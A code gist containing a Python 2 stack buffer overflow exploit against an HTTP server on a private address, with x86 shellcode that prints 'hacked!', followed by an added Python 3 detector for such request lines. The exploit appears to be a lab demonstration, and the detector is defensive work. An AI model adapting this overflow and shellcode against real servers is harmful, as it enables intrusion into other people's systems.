@danpalmer
Created December 14, 2012 17:14
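# Python 2 script (httplib was renamed http.client in Python 3).
import httplib

host = "172.16.89.128"
port = 8000
buffer_addr = "\x98\xF1\xFF\xBF" # 0xbffff198, stored little-endian
# x86 Linux shellcode: write(1, "hacked!", 7), then exit(0).
payload = """
\xEB\x19\x31\xC0\x31\xDB\x31\xD2\x31\xC9\xB0\x04\xB3
\x01\x59\xB2\x07\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD
\x80\xE8\xE2\xFF\xFF\xFF\x68\x61\x63\x6B\x65\x64\x21
""".strip()
padding = 1  # filler bytes placed between the payload and the address block

def overflow():
    # Layout: NOP sled, payload, padding, then the buffer address repeated
    # so that one copy lands on the saved return address.
    nops = "\x90" * 100
    rets = buffer_addr * 200
    code = nops + payload + ("A" * padding) + rets
    return code

def exploit():
    # The whole buffer is sent as the request path of a GET request.
    connection = httplib.HTTPConnection(host, port)
    connection.request("GET", overflow())
    response = connection.getresponse()

if __name__ == "__main__":
    exploit()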
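
A detection-side counterpart, added here as an example and not part of the original gist: a Python 3 check that flags request lines shaped like the one built above (raw binary in the request-target, a long run of 0x90, one 4-byte value repeated back to back). The function name, finding labels, thresholds and sample requests are assumptions made for this example.

```python
import re

# Thresholds are assumptions for this example; tune them for your traffic.
MAX_TARGET_LEN = 2048   # longest request-target accepted
NOP_RUN_MIN = 16        # consecutive 0x90 bytes treated as a sled
REPEAT_MIN = 8          # back-to-back repeats of one 4-byte value

NOP_RUN = re.compile(rb"\x90{%d,}" % NOP_RUN_MIN)
DWORD_REPEAT = re.compile(rb"(.{4})\1{%d,}" % (REPEAT_MIN - 1), re.DOTALL)


def inspect_request_line(line: bytes) -> list:
    """Return a list of findings for one raw HTTP request line."""
    try:
        method, rest = line.rstrip(b"\r\n").split(b" ", 1)
        target, version = rest.rsplit(b" ", 1)
    except ValueError:
        return ["malformed-request-line"]
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized-target")
    # RFC 3986 request-targets are printable ASCII; raw bytes must be %-encoded.
    if any(b < 0x21 or b > 0x7E for b in target):
        findings.append("raw-binary-in-target")
    if NOP_RUN.search(target):
        findings.append("nop-run")
    for m in DWORD_REPEAT.finditer(target):
        # Skip runs of a single byte (sleds and "aaaa..." style padding).
        if len(set(m.group(1))) > 1:
            findings.append("repeated-dword:" + m.group(1).hex())
            break
    return findings


# Constructed samples. The first has the same layout as the request above
# (sled, body, padding, repeated 4-byte value) with inert placeholder bytes.
SUSPECT = (b"GET " + b"\x90" * 100 + b"\xcc" * 39 + b"A"
           + b"\xde\xad\xbe\xef" * 200 + b" HTTP/1.1\r\n")
BENIGN = b"GET /search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1\r\n"

if __name__ == "__main__":
    print(inspect_request_line(SUSPECT))
    print(inspect_request_line(BENIGN))
```

The check has to run on the raw bytes of the request line, before any URL decoding or normalisation, otherwise the binary content is already altered or rejected by the time it is inspected.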